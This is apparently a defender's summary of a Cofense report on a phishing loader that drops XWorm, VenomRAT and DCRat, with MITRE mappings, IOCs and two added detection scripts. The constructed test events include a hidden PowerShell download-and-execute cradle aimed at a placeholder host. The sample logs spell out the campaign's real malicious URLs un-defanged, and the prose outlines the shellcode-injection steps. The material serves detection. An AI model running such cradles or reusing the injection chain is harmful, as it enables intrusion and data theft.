Cofense’s Phishing Defense Center discovered a layered phishing campaign that uses WebDAV-hosted shortcuts and heavily obfuscated scripts to deliver multiple remote access trojans, including VenomRAT, XWorm, AsyncRAT, and DCRat. The attack chain hides a PowerShell “PDF” that pulls an obfuscated batch (corn.bat) and a ZIP containing Python payloads which deploy via APC process injection into notepad.exe processes. #PythonRATLoader #XWorm

Key Points

  • Phishing emails impersonate a customer service request and use urgent language to trick recipients into clicking a malicious link.
  • A downloaded internet shortcut (file://) connects to a WebDAV service hosted through Cloudflare to present a fake “PDF” that is actually a PowerShell script.
  • The PowerShell script downloads and runs an obfuscated batch (corn.bat), which in turn fetches a ZIP that unpacks Python payloads placed in a hidden Python folder in AppData/Roaming.
  • Batch files are obfuscated with BatchShield and Python scripts are obfuscated with KRAMER to evade detection and slow analysis.
  • Modular Python payloads (xw.py, xo.py, ch.py) run via update.bat and use Early Bird APC process injection to execute shellcode in spawned notepad.exe processes, deploying XWorm, VenomRAT, and DCRat.
  • XWorm collects system, account, and browser data, logs keystrokes, attempts privilege escalation, persists via startup entries, and exfiltrates data over an encrypted C2 channel.
  • Cofense recommends strengthening user email awareness and reporting suspicious attachments or irregular URLs to reduce the chance of initial compromise.

MITRE Techniques

  • [T1059.001] Command and Scripting Interpreter: PowerShell – Used to execute silent PowerShell commands that download and run remote batch scripts (‘The RATLoader will execute silent PowerShell commands.’)
  • [T1566] Phishing – The campaign’s initial access vector is a deceptive phishing email (‘The Initial infection vector noted in our investigation is an impersonal phishing email.’)
  • [T1204] User Execution: Malicious Link/Malicious File – Victims are directed to a malicious URL in the email which pulls the initial payload (‘Initial Payload is pulled using a malicious URL present on the phishing email.’)
  • [T1140] Deobfuscate/Decode Files or Information – The delivered batch file is heavily obfuscated to hinder detection and analysis (‘The initial .bat file is heavily obfuscated to prevent detection by automated systems and to slow analysis.’)
  • [T1059.006] Command and Scripting Interpreter: Python – The ZIP includes Python dependencies and scripts used to run the RAT payloads (‘The Python dependencies needed for execution are included in the malicious .zip file.’)
  • [T1057] Process Discovery – XWorm queries running processes on the victim to gather system information (‘XWorm will pull system information about running programs.’)
  • [T1087] Account Discovery – XWorm enumerates accounts present on the machine (‘XWorm will pull account information present on the victim machine.’)
  • [T1217] Browser Information Discovery – XWorm harvests browser-stored information for exfiltration (‘XWorm will pull information present in the browser and store it for exfiltration.’)
  • [T1056.001] Input Capture: Keylogging – XWorm records user keystrokes and other interactions for collection (‘User interactions with keyboards and other peripherals are logged and stored for exfiltration by XWorm.’)
  • [T1068] Privilege Escalation – XWorm attempts to bypass controls to obtain administrator privileges (‘XWorm will attempt to bypass account controls and give itself administrator access.’)
  • [T1547] Boot or Logon AutoStart Execution – XWorm adds itself to startup entries to maintain persistence (‘XWorm will add itself to start-up programs.’)
  • [T1041] Exfiltration Over C2 Channel – Collected data is sent back to the actor over an encrypted C2 connection (‘XWorm will exfiltrate all collected information over an encrypted C2 connection.’)

Indicators of Compromise

  • [URL] Delivery and staging – hXXps://principles-yours-respected-skirt[.]trycloudflare[.]com/, hXXps://dl[.]dropboxusercontent[.]com/scl/fi/uc4m6iiv8h3raopsr6xd0/RE019290049022PDF.zip
  • [URL] WebDAV shortcut – file://puzzle-photographers-nitrogen-rod[.]trycloudflare[.]com@SSL/DavWWWRoot/DE (used to present the fake “PDF”)
  • [IP Address] Hosting infrastructure – 104.16.231.132, 162.125.3.15
  • [File Name] Delivered artifacts – corn.zip, RE019290049022PDF.zip, update.bat, corn.bat, xw.py, xo.py, ch.py
  • [Hash] Example file hashes – corn.zip MD5: fa30434fcbe067ad524ca1c00dcbca01; update.bat MD5: ba9d0ceb4bef463f86099709235d9a0e; and multiple other SHA256/MD5 hashes listed in the report
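The indicators above are published defanged (hXXp, [.]), so they cannot be pasted straight into a log search. The script below is an added example, not Cofense's code or anything from the report: it refangs the listed URLs, WebDAV path and IPs down to the host or address that would appear in a proxy log, sweeps a set of log lines for them, and checks a table of observed MD5 hashes against the two published ones. The proxy-log lines and the observed-hash table are constructed for illustration; the internal addresses and the benign destination use RFC 1918 and RFC 5737 ranges.

```python
"""Match the report's defanged indicators against constructed log lines.

Added example, not code from Cofense or the report. The log lines and the
observed-hash table below are constructed; the indicators are the report's.
"""
import re
from urllib.parse import urlsplit

# Indicators exactly as the report defangs them (hXXp and [.]).
DEFANGED_IOCS = [
    "hXXps://principles-yours-respected-skirt[.]trycloudflare[.]com/",
    "hXXps://dl[.]dropboxusercontent[.]com/scl/fi/uc4m6iiv8h3raopsr6xd0/RE019290049022PDF.zip",
    "file://puzzle-photographers-nitrogen-rod[.]trycloudflare[.]com@SSL/DavWWWRoot/DE",
    "104.16.231.132",
    "162.125.3.15",
]

# MD5 hashes the report publishes for two of the delivered artifacts.
KNOWN_MD5 = {
    "fa30434fcbe067ad524ca1c00dcbca01": "corn.zip",
    "ba9d0ceb4bef463f86099709235d9a0e": "update.bat",
}


def refang(ioc):
    """Reverse hXXp / [.] / [:] defanging so the value compares with live logs."""
    ioc = re.sub(r"^hxxp", "http", ioc, flags=re.IGNORECASE)
    return ioc.replace("[.]", ".").replace("[:]", ":")


def indicator_host(ioc):
    """Reduce a URL, WebDAV path or bare IP to the host that a proxy/DNS log would record."""
    clean = refang(ioc)
    parts = urlsplit(clean)
    if not parts.netloc:              # bare IP or hostname, no scheme
        return clean.lower()
    netloc = parts.netloc
    if netloc.lower().endswith("@ssl"):   # file://host@SSL/... is WebDAV-over-HTTPS UNC syntax
        netloc = netloc[:-4]
    return netloc.lower()


def indicator_hosts(iocs=DEFANGED_IOCS):
    """The distinct hosts/IPs to hunt for."""
    return {indicator_host(i) for i in iocs}


def scan_log_lines(lines, hosts=None):
    """Return (line_number, indicator) pairs for every indicator host seen in a line.

    Plain substring matching on the lower-cased line: adequate for proxy or DNS
    logs where the host appears verbatim, and deliberately easy to reason about.
    """
    hosts = sorted(hosts if hosts is not None else indicator_hosts())
    hits = []
    for number, line in enumerate(lines, start=1):
        lowered = line.lower()
        for host in hosts:
            if host in lowered:
                hits.append((number, host))
    return hits


def check_hashes(observed):
    """observed maps file name -> MD5 computed on the host; returns known-bad matches."""
    return [(name, KNOWN_MD5[md5.lower()])
            for name, md5 in observed.items() if md5.lower() in KNOWN_MD5]


# Constructed proxy-log lines (not from the report).
SAMPLE_PROXY_LOG = [
    "2025-09-02T10:13:58Z user=jdoe src=10.20.30.41 dst=104.16.231.132 method=PROPFIND url=https://puzzle-photographers-nitrogen-rod.trycloudflare.com/DavWWWRoot/DE status=207",
    "2025-09-02T10:14:07Z user=jdoe src=10.20.30.41 dst=104.16.231.132 method=GET url=https://principles-yours-respected-skirt.trycloudflare.com/ status=200",
    "2025-09-02T10:14:09Z user=jdoe src=10.20.30.41 dst=162.125.3.15 method=GET url=https://dl.dropboxusercontent.com/scl/fi/uc4m6iiv8h3raopsr6xd0/RE019290049022PDF.zip status=200",
    "2025-09-02T10:15:00Z user=asmith src=10.20.30.42 dst=203.0.113.5 method=GET url=https://www.example.com/ status=200",
]

# Constructed hash table, as an EDR or file-integrity sweep might report it.
SAMPLE_OBSERVED_HASHES = {
    "update.bat": "BA9D0CEB4BEF463F86099709235D9A0E",
    "readme.txt": "d41d8cd98f00b204e9800998ecf8427e",
}

if __name__ == "__main__":
    for number, host in scan_log_lines(SAMPLE_PROXY_LOG):
        print(f"line {number}: matched indicator {host}")
    for name, known in check_hashes(SAMPLE_OBSERVED_HASHES):
        print(f"{name}: MD5 matches the report's hash for {known}")
```

Matching on the host rather than the full URL is deliberate: the Cloudflare tunnel names are the durable part of the indicator, while the path after them can change between deliveries. The trycloudflare.com hostnames are also short-lived, so treat a hit as a prompt to pivot on the account and endpoint rather than as proof on its own.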

The Cofense Phishing Defense Center uncovered a multi-stage phishing campaign that abused WebDAV and cloud tunneling to trick recipients into downloading what appeared to be an invoice PDF but was actually a scripted loader. Attackers sent convincing, urgent emails impersonating a customer request; the message contained a URL that delivered an internet shortcut. When opened, that shortcut connected to a Cloudflare-backed WebDAV service and exposed a network folder view where a “PDF” was presented. Instead of a document, the file was a PowerShell script that used Invoke-Expression to execute remotely-hosted code and leveraged directory traversal and hidden-window flags to conceal activity.

The PowerShell “PDF” caused the victim’s browser (msedge.exe) to fetch an obfuscated batch file named corn.bat. Corn.bat was obfuscated with BatchShield, replacing readable commands and variables to impede detection and analysis. Once deobfuscated, the batch searches the user’s Downloads folder for a PDF, opens it to appear benign, and then downloads a ZIP (the Python 312 payload) into a hidden Python folder under AppData/Roaming. The batch uses PowerShell’s Invoke-WebRequest inside a try/catch block to reliably retrieve the ZIP from a Cloudflare-hosted URL.

Inside the extracted ZIP, the researchers found standard Python dependencies alongside three primary payload scripts: xw.py, xo.py, and ch.py. An update.bat file orchestrates execution: it ensures a single running instance, restarts itself minimized if necessary, changes to the Python working directory, and runs ch.py (DCRat), ex.py (VenomRAT), and xw.py (XWorm) sequentially before closing the command window. Each Python payload had been obfuscated with the open-source KRAMER tool to complicate static analysis.

At runtime, each Python script spawns a separate notepad.exe process and performs Early Bird APC (asynchronous procedure call) injection: the loader creates a new process and injects decrypted shellcode into the process before its thread begins, increasing the chance of evading early-stage antivirus checks. The scripts include an rc4_decrypt routine to decode embedded shellcode, allocate executable memory using ctypes.create_string_buffer, change memory protections via the VirtualProtect API to PAGE_EXECUTE_READWRITE, cast the buffer to a callable, and then transfer execution to the shellcode. Memory inspection revealed outbound connection strings tied to XWorm C2 infrastructure, and YARA matches confirmed XWorm indicators in the xw.py payload. Similarly, ch.py and ex.py injected their own shellcode into separate notepad.exe processes to instantiate DCRat and VenomRAT variants.
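The chain described in the last four paragraphs (hidden-window PowerShell that IEX-executes remote content, a batch stage under AppData/Roaming, a Python interpreter running from that folder, and notepad.exe processes spawned by python.exe) is what an endpoint sensor sees, and each step alone is weak evidence while the lineage together is strong. The following is an added example, not Cofense's code or a detection rule the report publishes: four narrow rules over process-creation events plus a lineage correlation that only alerts when several rules fire along one ancestor chain. The event schema (image, parent_image, command_line, pid, ppid) is an assumed Sysmon-like layout, the events are constructed, and the staging host, user names and the AppData\Roaming\Python folder name are placeholders rather than values from the report.

```python
"""Flag the PythonRATLoader process chain in constructed process-creation events.

Added example, not Cofense's code or a detection the report publishes. Field
names follow an assumed Sysmon-like schema; every event below is constructed.
"""
import re

# Python interpreter running out of a folder under AppData\Roaming.
PYTHON_IN_ROAMING = re.compile(r"\\appdata\\roaming\\.*python[^\\]*\\pythonw?\.exe$", re.I)
# Hidden window combined with Invoke-Expression, in either order.
HIDDEN_IEX = re.compile(
    r"-w(indowstyle)?\s+hidden.*(iex|invoke-expression)|(iex|invoke-expression).*-w(indowstyle)?\s+hidden", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_hidden_powershell_cradle(e):
    """PowerShell with a hidden window that IEX-executes remote content (the fake PDF)."""
    return (basename(e["image"]) == "powershell.exe"
            and HIDDEN_IEX.search(e["command_line"]) is not None
            and "http" in e["command_line"].lower())


def rule_batch_in_roaming(e):
    """cmd.exe running a .bat from AppData/Roaming (the corn.bat / update.bat stage)."""
    cl = e["command_line"].lower()
    return basename(e["image"]) == "cmd.exe" and ".bat" in cl and "\\appdata\\roaming\\" in cl


def rule_python_from_roaming(e):
    """A Python interpreter executing out of a folder under AppData/Roaming."""
    return PYTHON_IN_ROAMING.search(e["image"]) is not None


def rule_notepad_child_of_python(e):
    """notepad.exe spawned by python.exe: the injection host the report describes."""
    return (basename(e["image"]) == "notepad.exe"
            and basename(e["parent_image"]) in ("python.exe", "pythonw.exe"))


RULES = [rule_hidden_powershell_cradle, rule_batch_in_roaming,
         rule_python_from_roaming, rule_notepad_child_of_python]


def lineage_alerts(events, min_rules=2):
    """Report events whose own lineage (self plus ancestors) fired >= min_rules distinct rules.

    One rule alone (a developer's Python, a user's notepad) is noise; several
    along the same parent chain is the loader's shape.
    """
    by_pid = {e["pid"]: e for e in events}
    fired = {e["pid"]: {r.__name__ for r in RULES if r(e)} for e in events}
    alerts = []
    for e in events:
        names, pid, seen = set(), e["pid"], set()
        while pid in by_pid and pid not in seen:     # walk up; stop at unknown parent or cycle
            seen.add(pid)
            names |= fired[pid]
            pid = by_pid[pid]["ppid"]
        if len(names) >= min_rules:
            alerts.append((e["pid"], sorted(names)))
    return alerts


def ev(pid, ppid, image, parent_image, command_line):
    return {"pid": pid, "ppid": ppid, "image": image,
            "parent_image": parent_image, "command_line": command_line}


# Constructed events: one loader chain (pids 1000-1040) and three benign processes.
EXPLORER = r"C:\Windows\explorer.exe"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
ROAMING_PY = r"C:\Users\jdoe\AppData\Roaming\Python\python.exe"   # placeholder folder name
SAMPLE_EVENTS = [
    ev(1000, 500, EDGE, EXPLORER, "msedge.exe"),
    ev(1010, 1000, PS, EDGE, "powershell.exe -w hidden -c \"iex (iwr 'https://staging.example.invalid/')\""),
    ev(1020, 1010, CMD, PS, r'cmd.exe /c start /min "" "C:\Users\jdoe\AppData\Roaming\Python\update.bat"'),
    ev(1030, 1020, ROAMING_PY, CMD, "python.exe xw.py"),
    ev(1040, 1030, r"C:\Windows\System32\notepad.exe", ROAMING_PY, "notepad.exe"),
    ev(2000, 500, r"C:\Windows\System32\notepad.exe", EXPLORER, r"notepad.exe C:\Users\asmith\notes.txt"),
    ev(2010, 2005, r"C:\Python312\python.exe", CMD, "python.exe build.py"),
    ev(2020, 500, PS, EXPLORER, r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for pid, names in lineage_alerts(SAMPLE_EVENTS):
        print(f"pid {pid}: {len(names)} rules in lineage -> {', '.join(names)}")
```

The threshold is the tuning knob: at min_rules=2 the batch stage already alerts, which is early but will occasionally catch a legitimate script that runs from a roaming profile; at min_rules=4 only the notepad.exe injection host fires, which is very specific but late. Per-rule counts are kept in the alert so an analyst can see which stages were observed.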

Functionally, XWorm within this campaign performs discovery and collection tasks: it enumerates running processes, gathers account and browser information, logs keystrokes, and attempts to elevate privileges and persist by adding startup entries. Collected data is transmitted back to operators over an encrypted command-and-control channel. The campaign’s modular design allows multiple RAT families to be deployed from the same loader framework, each packing its own destructive capabilities and persistence mechanisms.

From the defenders’ perspective, several elements helped this attack succeed: a realistic social engineering lure, use of WebDAV and Cloudflare tunneling to host staging directories, multi-layered obfuscation (BatchShield for batch scripts and KRAMER for Python), and advanced in-memory injection techniques (Early Bird APC). These choices slow analysis, confuse automated detection, and let the actors run multiple payloads within innocuous-looking system processes.

Cofense’s conclusions emphasize that while individual techniques are not novel, their combined, well-orchestrated use raises the campaign’s complexity and impact. The report recommends bolstering user awareness about suspicious emails—especially unexpected ZIP/HTML/Office attachments, unfamiliar URLs, or messages using urgent or unusual language—and encouraging prompt reporting to security teams. Detection and remediation after successful infection are time-consuming and costly; preventing the initial click remains the most effective defense. Training, simulated phishing exercises, and robust reporting workflows can help organizations reduce the risk posed by loaders like PythonRATLoader that deliver XWorm, VenomRAT, DCRat, and other payloads.

Read more: https://cofense.com/blog/pythonratloader-the-proprietor-of-xworm-and-friends